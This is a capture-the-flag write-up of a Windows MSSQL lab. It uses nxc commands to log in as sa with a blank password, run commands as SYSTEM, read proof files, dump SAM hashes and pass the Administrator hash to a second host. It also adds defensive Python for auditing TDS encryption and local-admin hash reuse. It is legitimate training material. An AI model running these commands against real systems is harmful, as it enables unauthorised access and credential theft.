Legacy: an Easy MSSQL lab from secdojo
Overview
The IT Team was tasked to plan a database upgrade for a critical application. The application being very old, the DBA has kept the authorization layer unchanged.
Reconnaissance
Note: This writeup moves quickly through reconnaissance. For a detailed breakdown of the recon methodology, see the Cascade writeup.
This time we are dealing with two database servers. We run the basic nmap scans, though given that these are database hosts we can already expect to be dealing with MSSQL:
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2012 11.00.2100.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2026-03-31T00:36:47
| Not valid after: 2056-03-31T00:36:47
| MD5: eca3 f381 517f e2d3 0e83 75f7 6e24 7914
| SHA-1: 0a14 4791 c16f b9f3 b1d9 68f3 01eb a90d f198 3684
|_SHA-256: b98d cc07 6f30 25d6 5f24 3310 7796 3eb5 d030 e491 6026 ac84 7163 bac1 b932 0a9d
| ms-sql-info:
| 10.8.0.100:1433:
| Version:
| name: Microsoft SQL Server 2012 RTM
| number: 11.00.2100.00
| Product: Microsoft SQL Server 2012
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2026-03-31T00:41:31+00:00; +1s from scanner time.
| ms-sql-ntlm-info:
| 10.8.0.100:1433:
| Target_Name: SQLSERVER
| NetBIOS_Domain_Name: SQLSERVER
| NetBIOS_Computer_Name: SQLSERVER
| DNS_Domain_Name: SQLSERVER
| DNS_Computer_Name: SQLSERVER
|_ Product_Version: 6.3.9600
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=SQLSERVER
| Issuer: commonName=SQLSERVER
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-03-30T00:36:52
| Not valid after: 2026-09-29T00:36:52
| MD5: 49ce f5b0 3af7 ba8e 4eb5 6f09 2024 5bcc
| SHA-1: 305c 6e1e d685 6dee fdb7 0982 039f c40b 83eb 4555
|_SHA-256: 1fed 325d 2dce df86 e02d aa2d 040f b14f a618 c1a1 fc12 3490 7752 6eeb 7242 c1c3
|_ssl-date: 2026-03-31T00:41:31+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: SQLSERVER
| NetBIOS_Domain_Name: SQLSERVER
| NetBIOS_Computer_Name: SQLSERVER
| DNS_Domain_Name: SQLSERVER
| DNS_Computer_Name: SQLSERVER
| Product_Version: 6.3.9600
|_ System_Time: 2026-03-31T00:41:25+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/wsmans?
| ssl-cert: Subject: commonName=SQLSERVER
| Subject Alternative Name: DNS:SQLSERVER, DNS:SQLSERVER
| Issuer: commonName=SQLSERVER
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-04-15T03:33:38
| Not valid after: 2023-04-15T03:33:38
| MD5: e809 b79f 057a f00f dc18 ccf7 b9c1 267c
| SHA-1: af99 d750 759c a5a3 0ae5 785b 80c7 c5bd 2de0 9a82
|_SHA-256: f6ac 90ce 36cf 9aef f641 7c92 9f3c 5522 6819 170f fd94 b109 baf8 5546 79c9 8798
|_ssl-date: 2026-03-31T00:41:31+00:00; +1s from scanner time.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49163/tcp open msrpc Microsoft Windows RPC
And the second host:
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2012 11.00.2100.00; RTM
| ms-sql-ntlm-info:
| 10.8.0.101:1433:
| Target_Name: SQLSERVER
| NetBIOS_Domain_Name: SQLSERVER
| NetBIOS_Computer_Name: SQLSERVER
| DNS_Domain_Name: SQLSERVER
| DNS_Computer_Name: SQLSERVER
|_ Product_Version: 6.3.9600
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2026-03-31T00:37:22
| Not valid after: 2056-03-31T00:37:22
| MD5: a889 b273 c287 7f21 77b0 07b2 d381 6286
| SHA-1: dee0 fcf6 91f7 55a4 bc7f 2934 ff46 4939 8208 610e
|_SHA-256: 53b6 5ccf a3da 073c 1b02 0f79 53e8 b9db 9bfb a8a6 ca73 5b54 8000 f5b3 406d 0528
| ms-sql-info:
| 10.8.0.101:1433:
| Version:
| name: Microsoft SQL Server 2012 RTM
| number: 11.00.2100.00
| Product: Microsoft SQL Server 2012
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2026-03-31T00:41:37+00:00; +1s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=SQLSERVER
| Issuer: commonName=SQLSERVER
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2026-03-30T00:37:27
| Not valid after: 2026-09-29T00:37:27
| MD5: bcb2 7725 edfa 01ae 6c41 5fd3 2584 7478
| SHA-1: 049c 435d 356a 8098 7b34 370a 02a8 6c0b 66c3 2cea
|_SHA-256: 3753 918c d89b d810 baf6 24f8 8205 1b68 1ea8 e16a 2490 7cb7 f886 9ee6 99e3 292c
|_ssl-date: 2026-03-31T00:41:37+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: SQLSERVER
| NetBIOS_Domain_Name: SQLSERVER
| NetBIOS_Computer_Name: SQLSERVER
| DNS_Domain_Name: SQLSERVER
| DNS_Computer_Name: SQLSERVER
| Product_Version: 6.3.9600
|_ System_Time: 2026-03-31T00:41:31+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp open ssl/wsmans?
| ssl-cert: Subject: commonName=SQLSERVER
| Subject Alternative Name: DNS:SQLSERVER, DNS:SQLSERVER
| Issuer: commonName=SQLSERVER
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-04-15T03:33:38
| Not valid after: 2023-04-15T03:33:38
| MD5: e809 b79f 057a f00f dc18 ccf7 b9c1 267c
| SHA-1: af99 d750 759c a5a3 0ae5 785b 80c7 c5bd 2de0 9a82
|_SHA-256: f6ac 90ce 36cf 9aef f641 7c92 9f3c 5522 6819 170f fd94 b109 baf8 5546 79c9 8798
|_ssl-date: 2026-03-31T00:41:37+00:00; +1s from scanner time.
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49163/tcp open msrpc Microsoft Windows RPC
Device type: general purpose
So just MSSQL, as predicted, plus the bunch of MSRPC ports that are standard on Windows.
Exploitation
The description says ‘The application being very old, the DBA has kept the authorization layer unchanged’, so one thing to test for here is default or weak passwords:
┌──(kali㉿kali)-[/tmp/a]
└─$ nxc mssql 10.8.0.100 -u sa -p '' --local-auth
MSSQL 10.8.0.100 1433 SQLSERVER [*] Windows 8.1 / Server 2012 R2 Build 9600 (name:SQLSERVER) (domain:SQLSERVER) (EncryptionReq:False)
MSSQL 10.8.0.100 1433 SQLSERVER [+] SQLSERVER\sa: (Pwn3d!)
It worked. The Pwn3d! response means xp_cmdshell is available or can be enabled, giving OS-level command execution as the SQL service account. Also notable is EncryptionReq:False, meaning credentials are transmitted in cleartext on the wire. The build number 9600 is shared between Windows 8.1 and Server 2012 R2 — given the server context it’s almost certainly the latter, a version potentially vulnerable to MS17-010 or MS15-011 if unpatched. That said, with sa access we already have a direct path in.
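The EncryptionReq field in the nxc output is derived from the ENCRYPTION option the server returns in its TDS PRELOGIN response; only the value ENCRYPT_REQ means Force Encryption is enabled and the whole session must be TLS-protected. The Python below is an added example, not code from this writeup or from nxc, that decodes that option from a PRELOGIN packet so a defender can audit the setting on their own SQL Servers. The packet bytes are constructed inline to mimic a SQL Server 2012 reply (not a capture), and the helper names (build_prelogin_response, encryption_mode, encryption_required) are mine; the token values and packet layout follow the MS-TDS specification.

```python
"""Decode the ENCRYPTION option of a TDS PRELOGIN response (MS-TDS 2.2.6.5).

Added example: this is not the writeup's or nxc's code. The packet bytes are
constructed here to mimic a SQL Server 2012 reply, not taken from a capture.
"""
import struct

TDS_PRELOGIN = 0x12          # packet type byte for PRELOGIN messages
OPT_VERSION = 0x00           # PRELOGIN option tokens
OPT_ENCRYPTION = 0x01
OPT_TERMINATOR = 0xFF

# Values of the ENCRYPTION option. Only ENCRYPT_REQ means Force Encryption
# is enabled, i.e. the whole session (not just the login packet) is TLS-protected.
ENCRYPTION_NAMES = {
    0x00: "ENCRYPT_OFF",      # encryption available but off
    0x01: "ENCRYPT_ON",       # encryption on, negotiated with the client
    0x02: "ENCRYPT_NOT_SUP",  # server does not support encryption at all
    0x03: "ENCRYPT_REQ",      # server requires encryption (Force Encryption)
}


def parse_prelogin_options(packet: bytes) -> dict:
    """Return {token: raw_bytes} for every option in a PRELOGIN packet.

    Layout: 8-byte TDS header, then 5-byte option headers (token, offset, length;
    big-endian, offset relative to the payload start) ended by 0xFF, then the data.
    Every offset/length is bounds-checked before it is used.
    """
    if len(packet) < 8 or packet[0] != TDS_PRELOGIN:
        raise ValueError("not a TDS PRELOGIN packet")
    declared_len = struct.unpack(">H", packet[2:4])[0]
    if declared_len != len(packet):
        raise ValueError("TDS header length does not match packet size")
    payload = packet[8:]
    options = {}
    pos = 0
    while True:
        if pos >= len(payload):
            raise ValueError("option list not terminated")
        token = payload[pos]
        if token == OPT_TERMINATOR:
            return options
        if pos + 5 > len(payload):
            raise ValueError("truncated option header")
        offset, length = struct.unpack(">HH", payload[pos + 1:pos + 5])
        if offset + length > len(payload):
            raise ValueError(f"option 0x{token:02x} points outside the payload")
        options[token] = payload[offset:offset + length]
        pos += 5


def encryption_mode(packet: bytes) -> str:
    """Name of the server's ENCRYPTION setting, e.g. 'ENCRYPT_REQ'."""
    options = parse_prelogin_options(packet)
    value = options.get(OPT_ENCRYPTION, b"")
    if len(value) != 1:
        raise ValueError("PRELOGIN response carries no ENCRYPTION option")
    return ENCRYPTION_NAMES.get(value[0], f"unknown(0x{value[0]:02x})")


def encryption_required(packet: bytes) -> bool:
    """True only when the server forces encryption (what nxc reports as EncryptionReq)."""
    return encryption_mode(packet) == "ENCRYPT_REQ"


def build_prelogin_response(encryption: int) -> bytes:
    """Constructed sample server reply (not a capture): VERSION 11.0.2100 + ENCRYPTION."""
    version = bytes([0x0B, 0x00, 0x08, 0x34, 0x00, 0x00])  # major, minor, build (BE), subbuild
    headers_len = 5 + 5 + 1  # two option headers plus the terminator byte
    headers = (bytes([OPT_VERSION]) + struct.pack(">HH", headers_len, len(version))
               + bytes([OPT_ENCRYPTION]) + struct.pack(">HH", headers_len + len(version), 1)
               + bytes([OPT_TERMINATOR]))
    payload = headers + version + bytes([encryption])
    # type, status (0x01 = end of message), length, SPID, packet id, window
    header = struct.pack(">BBHHBB", TDS_PRELOGIN, 0x01, 8 + len(payload), 0, 0, 0)
    return header + payload


if __name__ == "__main__":
    for value in ENCRYPTION_NAMES:
        pkt = build_prelogin_response(value)
        print(f"{encryption_mode(pkt):16s} EncryptionReq:{encryption_required(pkt)}")
```

Against a live server you would send a client PRELOGIN and feed the reply to encryption_mode; anything other than ENCRYPT_REQ is the finding. The remediation is to enable Force Encryption for the instance in SQL Server Configuration Manager with a certificate the clients can validate, which also replaces the 1024-bit SHA-1 SSL_Self_Signed_Fallback certificate the nmap scan reported.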
┌──(kali㉿kali)-[/tmp/a]
└─$ nxc mssql 10.8.0.100 -u sa -p '' --local-auth -x 'whoami'
MSSQL 10.8.0.100 1433 SQLSERVER [*] Windows 8.1 / Server 2012 R2 Build 9600 (name:SQLSERVER) (domain:SQLSERVER) (EncryptionReq:False)
MSSQL 10.8.0.100 1433 SQLSERVER [+] SQLSERVER\sa: (Pwn3d!)
MSSQL 10.8.0.100 1433 SQLSERVER [+] Executed command via mssqlexec
MSSQL 10.8.0.100 1433 SQLSERVER nt authority\system
┌──(kali㉿kali)-[/tmp/a]
└─$ nxc mssql 10.8.0.100 -u sa -p '' --local-auth -x 'type C:\Users\Administrator\Desktop\proof.txt'
MSSQL 10.8.0.100 1433 SQLSERVER [*] Windows 8.1 / Server 2012 R2 Build 9600 (name:SQLSERVER) (domain:SQLSERVER) (EncryptionReq:False)
MSSQL 10.8.0.100 1433 SQLSERVER [+] SQLSERVER\sa: (Pwn3d!)
MSSQL 10.8.0.100 1433 SQLSERVER [+] Executed command via mssqlexec
MSSQL 10.8.0.100 1433 SQLSERVER flag_88c760b6_e378_46a4_9187_9ad206d94d8b
The SQL service runs as SYSTEM, so we were able to retrieve the first flag.
Privilege Escalation
┌──(kali㉿kali)-[/tmp/a]
└─$ nxc mssql 10.8.0.100 -u sa -p '' --local-auth --sam
MSSQL 10.8.0.100 1433 SQLSERVER [*] Windows 8.1 / Server 2012 R2 Build 9600 (name:SQLSERVER) (domain:SQLSERVER) (EncryptionReq:False)
MSSQL 10.8.0.100 1433 SQLSERVER [+] SQLSERVER\sa: (Pwn3d!)
MSSQL 10.8.0.100 1433 SQLSERVER [*] Dumping SAM hashes
MSSQL 10.8.0.100 1433 SQLSERVER Administrator:500:aad3b435b51404eeaad3b435b51404ee:b8906a1410a19022a43390ac35290d6f:::
MSSQL 10.8.0.100 1433 SQLSERVER Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Well, since this is an old environment, there is a high chance that the person who set up the first database also set up the second one, so password reuse is to be expected. Let's check:
┌──(kali㉿kali)-[/tmp/a]
└─$ nxc smb 10.8.0.101 -u administrator -H b8906a1410a19022a43390ac35290d6f
SMB 10.8.0.101 445 SQLSERVER [*] Windows Server 2012 R2 Standard 9600 x64 (name:SQLSERVER) (domain:SQLSERVER) (signing:False) (SMBv1:True)
SMB 10.8.0.101 445 SQLSERVER [+] SQLSERVER\administrator:b8906a1410a19022a43390ac35290d6f (Pwn3d!)
┌──(kali㉿kali)-[/tmp/a]
└─$ nxc smb 10.8.0.101 -u administrator -H b8906a1410a19022a43390ac35290d6f -x 'type C:\Users\Administrator\Desktop\proof.txt'
SMB 10.8.0.101 445 SQLSERVER [*] Windows Server 2012 R2 Standard 9600 x64 (name:SQLSERVER) (domain:SQLSERVER) (signing:False) (SMBv1:True)
SMB 10.8.0.101 445 SQLSERVER [+] SQLSERVER\administrator:b8906a1410a19022a43390ac35290d6f (Pwn3d!)
SMB 10.8.0.101 445 SQLSERVER [+] Executed command via wmiexec
SMB 10.8.0.101 445 SQLSERVER flag_1c037aa4_e58b_416b_9c64_6b8857f74c7e
And we got the second flag.
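The reuse hypothesis that worked here is exactly what a defender can test for proactively: compare the local Administrator (RID 500) NT hashes across hosts and flag any hash present on more than one machine, which is the condition LAPS exists to remove. The Python below is an added example, not part of the writeup or of nxc, that parses pwdump-style SAM lines (user:rid:lmhash:nthash:::, the format shown in the --sam output above) for several hosts and reports shared hashes and blank passwords. The host names, dump text and non-empty hashes are constructed sample values; 31d6cfe0d16ae931b73c59d7e0c089c0 is the well-known NT hash of the empty password.

```python
"""Flag local-admin NT hash reuse and blank passwords across SAM dumps.

Added example, not the writeup's or nxc's code. Host names, dump text and the
non-empty hashes below are constructed sample values.
"""
import re
from collections import defaultdict

# Well-known NT hash of the empty password (MD4 of an empty UTF-16LE string).
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump-style line as printed by nxc --sam: user:rid:lmhash:nthash:::
SAM_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I
)

# Constructed sample dumps for three hosts (hashes are made up, except the empty one).
SAMPLE_DUMPS = {
    "db01": (
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::\n"
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n"
    ),
    "db02": (
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::\n"
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n"
    ),
    "db03": (
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::\n"
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n"
        "svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n"
    ),
}


def parse_sam_dump(host: str, text: str) -> list:
    """Parse one host's dump into rows; lines that do not match the format are skipped."""
    rows = []
    for line in text.splitlines():
        m = SAM_LINE.match(line.strip())
        if m:
            rows.append({"host": host, "user": m["user"], "rid": int(m["rid"]), "nt": m["nt"].lower()})
    return rows


def find_reused_hashes(dumps: dict, rids=(500,)) -> dict:
    """Map NT hash -> sorted hosts, for accounts whose RID is in `rids`, keeping only
    hashes seen on two or more hosts (the same password on several machines)."""
    hosts_by_hash = defaultdict(set)
    for host, text in dumps.items():
        for row in parse_sam_dump(host, text):
            if row["rid"] in rids:
                hosts_by_hash[row["nt"]].add(host)
    return {h: sorted(hosts) for h, hosts in hosts_by_hash.items() if len(hosts) > 1}


def find_blank_passwords(dumps: dict) -> list:
    """(host, user) pairs whose NT hash is the empty-password hash, in dump order."""
    return [(row["host"], row["user"])
            for host, text in dumps.items()
            for row in parse_sam_dump(host, text)
            if row["nt"] == EMPTY_NT_HASH]


if __name__ == "__main__":
    for nt_hash, hosts in find_reused_hashes(SAMPLE_DUMPS).items():
        print(f"RID-500 hash {nt_hash} reused on: {', '.join(hosts)}")
    for host, user in find_blank_passwords(SAMPLE_DUMPS):
        print(f"blank password: {host}\\{user}")
```

The Guest account is disabled by default, so its blank hash is expected and can be filtered by RID; a blank hash on any other account, like the constructed svc_backup row, is a finding. Only the hashes need to be compared, never cracked, so this check can run as part of a routine audit of local-admin hygiene.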

